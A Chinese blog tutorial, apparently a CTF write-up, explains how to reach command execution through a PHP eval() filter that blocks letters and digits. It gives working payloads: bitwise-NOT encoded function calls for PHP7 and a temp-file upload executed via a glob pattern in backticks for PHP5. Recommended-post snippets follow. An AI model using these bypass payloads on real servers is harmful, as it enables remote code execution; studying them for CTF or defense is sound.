RCE---无字母数字webshell

已于 2024-08-11 15:58:15 修改
阅读量437 收藏 8
点赞数 5
文章标签: 服务器 网络 安全
于 2024-08-11 14:33:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a15183865601/article/details/141104347
版权 
<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

分析代码:传参不大于35,且传参不能为字母数字下划线与&符

这种情况怎那么进行命令执行?

php7

PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7后可以。

所以可以在$a的位置写我们想要执行的函数,但这里正则过滤了字母数字,怎么办?

取反

php中’~‘表示取反,而取反之后大都是不可见字符,如:

<?php
var_dump(urlencode(~'system'));

取反后的值为%8C%86%8C%8B%9A%92

解码后

所以答案基本上就出来了,

<?php
var_dump(urlencode(~'phpinfo'));

payload=(~%8F%97%8F%96%91%99%90)();

 

成功

php5

前面说过,($a)()这种方式实在php7之后才可以使用,那php5下怎么办?

同样的方法php5无法执行

在linux下,使用点+空格+文件名可以在没有执行权限的情况下执行文件,那么我们是否可以通过上传文件然后执行的方式来实现呢?

根据验证,通过post上传的文件会放在/tem/php******,后面的字符是随机的,那么问题来了,怎么匹配到这个文件?

通配符

很多人知道linux通配符有?和*,可以使用通配符来进行匹配,但经过验证,无法准确匹配

 但其实还要一直通配符

[^a]表示这里不为a

[0-9]表示0-9这个范围

而注意到linux中文件基本都是小写,我们上传的文件中后几位是随机的,可能包含大写,所以我们就只需要利用[]表示出大写字母就可以了

在ascii表中,大写字母处于@-[之间,所以很明确了,使用/???/???????[@-[]来进行匹配

执行

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
   <form action="web.php" method="post" enctype="multipart/form-data">
        <input type="file" name="file" id="">
        <input type="submit" value="submit">
   </form>
</body>
</html>

写一个form表单上传文件到web.php

使用bp抓包,抓一个上传文件的包和web.php的包

上传:

 web.php

把第一个包的post内容放到web.php中

 发送请求

成功执行

 payload

至于payload为什么要写成

?><?=`. /???/????????[@-[]`;?>

php关于eval这样写的

 而<?=是在php5.4之后<? php echo的一种简写

因为php无法执行linux命令,而反引号可以,所以后面加上了反引号

a15183865601
关注
RCE-无字母数字webshell命令执行
2301_78549931的博客
08-12 681
这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小字母。我们只要找到一个可以表示“大字母”的glob通配符,就能精准找到我们要执行的文件。可以看出存在这么多的文件,执行第一个匹配上的文件(即/bin/addr2l ine)的时候就已经出现了错误,导致整个流程停止,根本不会执行到我们上传的文件。那么,/tmp/phpXXXXXX就可以表示为/*/?这是由于执行. /?
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2130
命令执行无字母数字webshell
RCE - - 无字母数字远程命令执行
m0_65466288的博客
08-24 517
执行成功,我们只用把里面要去反的函数的反码进行更换即可。但是,这种方法只适用于php版本在7以上,低版本并不支持这种形式。这样的方法来执行动态函数的,但PHP7中增加了()()这种形式的命令执行。在PHP7中就不是非常困难,因为PHP7前是不允许用。这道题 code 接。所以我们有关$和_的方式都无法实现了。webshell长度不超过35位。除了不包含字母数字,还不能包含。
字母数字RCE
yourdawntown的博客
09-06 2036
版本为php5 php5中assert是一个函数,我们可以通过f=′assert′;f='assert';f=′assert′;f(…);这样的方法来动态执行任意代码。 但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。但也无需过于担心,比如我们利用file_put_contents函数,同样可以用来getshell。 无数字字母rce 测试代码 <?php if(!preg_match('/[a-z0-9]/is',
字母数字rce总结(自增、取反、异或、或、临时文件上传)
whale_waves的博客
02-29 1970
临时文件上传 通过上传文件然后用符号.调用执行文件 第一个知识点: 通过post上传文件,此时php会在linux里的零时文件夹保存文件,且文件一定是php加上六个随机的字符 /tmp/php?????? 这个应php保存的临时文件会有一个特性,就是这6个随机的字符会出现大的情况 例如: 普通文件/tmp/adcabcabc php保存的临时文件/tmp/phpAvxAsa 第二个知识点: 现在直到了文件上传的位置以及特性那么现在要怎么利用它 shell下支持使用. 来
RCE-eval长度限制突破技巧
dragon的博客
08-12 1211
执行命令行命令“入如下内容到文件,会自动将创建木马文件并将一句话木马入其中,使用连接工具连接即可。
ctfshow-web入门56(再次理解无数字字母rce
qq_44657899的博客
10-18 1821
前言 之前做过一道红包题第二弹,这里也是同样的解法,但是新学到了很多知识点,记录一下。 这个解法,p神的文章讲的很清楚无字母数字webshell之提高篇 文章目录前言glob通配符. 执行文件不需要x权限题解 glob通配符 因为只有PHP生成的临时文件包含大字母,所以可以用/???/????????[@-[]来匹配我们上传的临时文件。 原理: 翻开ascii码表,可见大字母位于@与[之间: 那么,我们可以利用[@-[]来表示大字母: . 执行文件不需要x权限 题解 注意传参方式为POST。
RCE-eval长度限制突破技巧
2301_80177550的博客
08-12 469
执行命令行命令“入如下内容到文件,会自动将创建木马文件并将一句话木马入其中,使用连接工具连接即可。
红队专题-漏洞挖掘代码审计-RCE-SSRF
aming小老弟
11-30 1408
可以进行批量存活扫描和目录扫描 ------>在好几个站下面发现web.zip备份文件。可以看到,传入进来的密码是RSA类型,先进行了一次RSA解密,然后进行了一次DES加密。经过之前的审计,发现了很多接口都存在漏洞,现在成功登录了。岂不是随便getshell。但是登录过程中,密码是RSA加密过后传输的,而后端居然是33位的md5加密。密码传入后,调用了CommFun.EnPwd进行了一次加密。某方法接收了两个参数,却只对一个参数进行了过滤。该方法需要提供绝对路径----->跟踪相关参数。
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
Web安全】无字母数字Webshell总结 在Web安全领域,Webshell是一种常见的攻击手段,用于在目标服务器上获得远程控制。无字母数字Webshell是指避开常规字母数字字符限制的Webshell构造方法。通常,服务器会通过...
ctfshow web41 无字母数字命令执行
Sapphire037的博客
10-30 2369
1 首先,捋一捋思路,我们可以先看过滤的字符 比如/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i或者/[a-z0-9]/is 这里可以先看P神的一些不包含数字字母webshell ,大概意思就是通过一些字符互相运算后构造得到我们的payload,了解基本原理之后,我们再看ctfshow中的这样一道例题 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31
一些RCE的汇总
qaq517384的博客
11-23 1109
无参数rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2210
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器为Linux系统区分大小 就无法通过大小来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
服务器感染了.baxia勒索病毒,如何确保数据文件完整恢复?
数据恢复研究℃
09-28 639
baxia勒索病毒是一种设计精巧的恶意软件,它通过加密受害者的文件并更改文件扩展名为“.baxia”,使得数据无法正常访问。一旦感染,该病毒会扫描计算机中的图像、视频、生产力文档等文件(如.doc、.docx、.xls、.pdf等),并对这些文件进行加密。加密完成后,病毒会显示一个包含勒索信息的文件,要求受害者支付比特币等加密货币以换取数据访问权。.baxia勒索病毒不仅具备自我升级能力,能够通过网络自我更新其加密算法和传播技术,还使用伪装技术隐藏在正常的文件和应用程序中,避开传统的防病毒扫描。
在 Ubuntu 下通过 Docker 部署 NAS 服务器
最新发布
shelby_loo的博客
09-30 543
Docker 是一个开源的容器化平台,通过将应用及其依赖打包到容器中,简化了软件的部署与管理。Docker 可以让我们轻松地在任何环境中运行应用,并且可以快速地创建、移动和复制容器。对于 NAS(网络附加存储)软件,最受欢迎的选择之一是。它是一个基于 Debian 的 NAS 解决方案,提供了丰富的功能,如文件共享、备份、用户管理等。通过 Docker 部署 OpenMediaVault,不仅节省系统资源,还能实现快速恢复和轻松升级。
电脑加密机的基本功能与模块
SafePloy_SH的博客
09-30 655
当需要传输数据时,加密机会将数据进行加密处理,使得数据在传输过程中以密文的形式存在,从而防止数据被未经授权的人员获取和篡改。加密机与主机之间使用TCP/IP协议通信,因此对主机的类型和主机操作系统无特殊要求,但仍需确保加密机与主机的硬件和软件环境相匹配。电脑加密机,又称主机加密机,是一种通过国家商用密码主管部门鉴定并批准使用的国内自主开发的主机加密设备。功能:电脑加密机主要通过使用密码学算法对数据进行加密和解密,以保护数据的机密性和完整性。性能:加密机的性能会影响加密和解密的速度以及系统的整体性能。
RM服务器研究(一)
u010401391的专栏
09-28 737
TCP 123.99.199.149:1054 127.0.0.1:20220【地图网关/登录服端口,服务器内部用到】 ESTABLISHED 3104。C:\Users\Administrator>tasklist|findstr "svMapCenter"【统计在线人数,相当于协调服,端口10113】C:\Users\Administrator>tasklist|findstr "svIP"【相当于登录服,端口10100】选择Binary search。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值